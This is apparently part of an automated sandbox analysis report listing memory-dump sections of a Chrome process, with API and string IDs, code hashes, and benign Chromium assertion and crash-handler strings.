                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$AddressCreateFileHandleModuleProc
                                                                    • String ID: ..\..\base\files\file_win.cc$DoInitialize$GetHandleVerifier
                                                                    • API String ID: 2959055312-1999724202
                                                                    • Opcode ID: c4d6f6fe797e706201885e0db57a8cb9239e864aab7662ddd6e639757b5e28b5
                                                                    • Instruction ID: b4d22dd12a45475710db2e9c97b51e1a6801c459264dcd2a92985a53d124bb15
                                                                    • Opcode Fuzzy Hash: c4d6f6fe797e706201885e0db57a8cb9239e864aab7662ddd6e639757b5e28b5
                                                                    • Instruction Fuzzy Hash: AD71E021B5C612C2FB28FB25A455BB9A7A2FF85780F808436CE4E067D1DE3CE4428764
                                                                    APIs
                                                                    Strings
                                                                    • UUUUUUUU, xrefs: 00007FF74CCDEF82
                                                                    • 33333333, xrefs: 00007FF74CCDEAAF
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF74CCDEF05
                                                                    • UUUUUUUU, xrefs: 00007FF74CCDEA9C
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF74CCDEEF2
                                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00007FF74CCDEEDF
                                                                    • 33333333, xrefs: 00007FF74CCDEF95
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$33333333$33333333$UUUUUUUU$UUUUUUUU
                                                                    • API String ID: 1678258262-3195743867
                                                                    • Opcode ID: a3e071ebf1df1586782c834849a57a54a47a609bf626a61d6b5af28ae06a54dd
                                                                    • Instruction ID: 1a9adb15d2a7dfc45730bb435f310bbaf0b535e140a684857905a34f3a135948
                                                                    • Opcode Fuzzy Hash: a3e071ebf1df1586782c834849a57a54a47a609bf626a61d6b5af28ae06a54dd
                                                                    • Instruction Fuzzy Hash: 0EE1B161B1D616C1EE20FB16A4113B8A291BF45B90FC9853BD92E57798EF3CF485C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorExclusiveFileLastLock$AcquireCounterCreateMappingPerformanceQueryReleaseView
                                                                    • String ID: ..\..\base\files\memory_mapped_file_win.cc$GetHandleVerifier$MapFileRegionToMemory$ScopedBlockingCall
                                                                    • API String ID: 749074358-664693454
                                                                    • Opcode ID: e9249aed97ee22f14a61468ec1b127e5d490433622525fc9dddd09b816df9c5a
                                                                    • Instruction ID: 4897ec42c780facd0ee5050043a3cec5a1034983068c5824867f4c08107eeb84
                                                                    • Opcode Fuzzy Hash: e9249aed97ee22f14a61468ec1b127e5d490433622525fc9dddd09b816df9c5a
                                                                    • Instruction Fuzzy Hash: 5581A221B1DA92C2FA64FB25E8557B9E3A1BF44780F809433DA4E1B755DF3CE0458724
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: Create$ErrorEventLast$Thread
                                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\thread\thread_win.cc$..\..\third_party\crashpad\crashpad\util\win\session_end_watcher.cc$CreateEvent$CreateThread$Start
                                                                    • API String ID: 426894506-1853482706
                                                                    • Opcode ID: 3c89ad79f4bd532fd803494dab03a42d3e2e542afddfd6432bc8db494f40cd8e
                                                                    • Instruction ID: 86a86ade2e4338ed1900612a4217bde83485fe6c165bfd086ac12d87964ba4d2
                                                                    • Opcode Fuzzy Hash: 3c89ad79f4bd532fd803494dab03a42d3e2e542afddfd6432bc8db494f40cd8e
                                                                    • Instruction Fuzzy Hash: 9251DF31B4C652D2FA64FB24A5513BAA366FF44780FC18037D94E0BAA6DF2CE185C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ..\..\base\files\file_win.cc$Close$GetHandleVerifier$ScopedBlockingCall$chrome.dll
                                                                    • API String ID: 1646373207-503312030
                                                                    • Opcode ID: 619e2ffe711d669c1116779cc53eeccc70ee53bc40e1d87c3705f5f96b3584e6
                                                                    • Instruction ID: db8e9ace1ccfae77f8696b6fa5cc67771f492a92c07cb89ae581fc448a7320b7
                                                                    • Opcode Fuzzy Hash: 619e2ffe711d669c1116779cc53eeccc70ee53bc40e1d87c3705f5f96b3584e6
                                                                    • Instruction Fuzzy Hash: 0B513735B0CA56C1FA24BB65E4553B9E3A1BF85780F808433EA8E063A5DF3CE545CB20
                                                                    APIs
                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,00000128), ref: 00007FF74CCE7018
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__memory\assume_aligned.h:34: assertion reinterpret_cast<uintptr_t>(__ptr) % _Np == 0 failed: Alignment assumption is violated, xrefs: 00007FF74CCE7152
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AcquireExclusiveLock
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\assume_aligned.h:34: assertion reinterpret_cast<uintptr_t>(__ptr) % _Np == 0 failed: Alignment assumption is violated
                                                                    • API String ID: 4021432409-4093645785
                                                                    • Opcode ID: 78de5c242a78ca502bc48672e33ea5357881baf041475c31b65e561cab8bb5ba
                                                                    • Instruction ID: 7ef6ff82c4b8eabee059c74e2761bf4a0c6d93dfbab327b92d583ed38dbaa506
                                                                    • Opcode Fuzzy Hash: 78de5c242a78ca502bc48672e33ea5357881baf041475c31b65e561cab8bb5ba
                                                                    • Instruction Fuzzy Hash: 7A12DD22F1D652C2FA59FB25E841378A3A0AF56B94F844533CA0D177D1DF3CE892A360
                                                                    APIs
                                                                    Strings
                                                                    • AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed, xrefs: 00007FF74CDB9BAE
                                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00007FF74CDB9BDF
                                                                    • AttemptToNotifyRunningChrome:Error SendFailed, xrefs: 00007FF74CDB9ADD
                                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF74CDB9B1E
                                                                    • N, xrefs: 00007FF74CDB9931
                                                                    • source-shortcut, xrefs: 00007FF74CDB977D
                                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF74CDB9B0B
                                                                    • AttemptToNotifyRunningChrome:Error RemoteDied, xrefs: 00007FF74CDB9AD1
                                                                    • AttemptToNotifyRunningChrome:Error RemoteHung, xrefs: 00007FF74CDB9C6C
                                                                    • AttemptToNotifyRunningChrome, xrefs: 00007FF74CDB9B57
                                                                    • AttemptToNotifyRunningChrome:SendMessage, xrefs: 00007FF74CDB9C42
                                                                    • AttemptToNotifyRunningChrome:GetCurrentDirectory failed, xrefs: 00007FF74CDB9C15
                                                                    • START, xrefs: 00007FF74CDB97A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryErrorInfoLastStartup
                                                                    • String ID: N$..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$AttemptToNotifyRunningChrome$AttemptToNotifyRunningChrome:Error RemoteDied$AttemptToNotifyRunningChrome:Error RemoteHung$AttemptToNotifyRunningChrome:Error SendFailed$AttemptToNotifyRunningChrome:GetCurrentDirectory failed$AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed$AttemptToNotifyRunningChrome:SendMessage$START$source-shortcut
                                                                    • API String ID: 783172407-57341767
                                                                    • Opcode ID: 69703120a644ed4d77e00c2738d113a8e94615e417799fea359f0c1b08a7f0c6
                                                                    • Instruction ID: 63e2513005bbe32d028c5dbf15c3290f72cc5be2c2d60dbc0712f78a265e639f
                                                                    • Opcode Fuzzy Hash: 69703120a644ed4d77e00c2738d113a8e94615e417799fea359f0c1b08a7f0c6
                                                                    • Instruction Fuzzy Hash: D6F12A75A0CBD2D1EA21BB14E4513FAB3A0BB85784F845036DACC1769AEF3DE145CB60
                                                                    APIs
                                                                    Strings
                                                                    • --thread=, xrefs: 00007FF74CC3CCAA
                                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF74CC3CF45
                                                                    • exception-pointers, xrefs: 00007FF74CC3CBC8
                                                                    • database, xrefs: 00007FF74CC3CB50
                                                                    • process, xrefs: 00007FF74CC3CC4D
                                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF74CC3CF32
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF74CC3CEC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastProcess$AttributeCurrentOpenProcThreadUpdate
                                                                    • String ID: --thread=$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$database$exception-pointers$process
                                                                    • API String ID: 3486958663-843892808
                                                                    • Opcode ID: 1d2db6461e8cdd91804bdc77ecbe9eaabcb3b6fd86a577271467b268bf945227
                                                                    • Instruction ID: b9036568c86b612d8fb63bd097519b4e970de118e8d74ae1145110f2151f17a5
                                                                    • Opcode Fuzzy Hash: 1d2db6461e8cdd91804bdc77ecbe9eaabcb3b6fd86a577271467b268bf945227
                                                                    • Instruction Fuzzy Hash: 44E16D22B0CB96C6EA24FB25F4403BAA3A0FB45794F944632DA9D077A5DF3CE065C710
                                                                    APIs
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00007FF74CD3059B
                                                                    • <, xrefs: 00007FF74CD30500
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireErrorLast$Release$CounterPerformanceQuery
                                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value$<
                                                                    • API String ID: 593636287-1283766859
                                                                    • Opcode ID: 54f72243676df58816ec67bd6189fb41f0ce39054c700e3655b6e2e5e6e79e5d
                                                                    • Instruction ID: 1a94d688592436f82ea8eb1e39681c4f486e2619b0ef94daf9ebddf1389ed126
                                                                    • Opcode Fuzzy Hash: 54f72243676df58816ec67bd6189fb41f0ce39054c700e3655b6e2e5e6e79e5d
                                                                    • Instruction Fuzzy Hash: C9C1B022B0CA42C2EB61BB21A550379B3A5FF45B94F955237DA4E166A1DF7CF081C720
                                                                    APIs
                                                                    Strings
                                                                    • type, xrefs: 00007FF74CC3B77D
                                                                    • fallback-handler, xrefs: 00007FF74CC3B763
                                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF74CC3BA09
                                                                    • database, xrefs: 00007FF74CC3B7F3
                                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF74CC3B648
                                                                    • SetUnhandledExceptionFilter, xrefs: 00007FF74CC3B8B5
                                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF74CC3B9F6
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF74CC3B66A, 00007FF74CC3B94C
                                                                    • kernel32.dll, xrefs: 00007FF74CC3B89F
                                                                    • test-child-process, xrefs: 00007FF74CC3B7A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$SetUnhandledExceptionFilter$database$fallback-handler$kernel32.dll$test-child-process$type
                                                                    • API String ID: 1646373207-3386034524
                                                                    • Opcode ID: bd2393313b8cfd74a05d8eb7a8c99aa53a8ca6093803d458adce3ae35e96eda5
                                                                    • Instruction ID: fc26c386ef5a563e9e79b0834b3883f31e037a93ce65985db8d682e1ecb3b137
                                                                    • Opcode Fuzzy Hash: bd2393313b8cfd74a05d8eb7a8c99aa53a8ca6093803d458adce3ae35e96eda5
                                                                    • Instruction Fuzzy Hash: 5D913B22A0CB92D2EA60FB10E4513F9A3A0FB95744F819137DA8C177A6DF7CE195C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
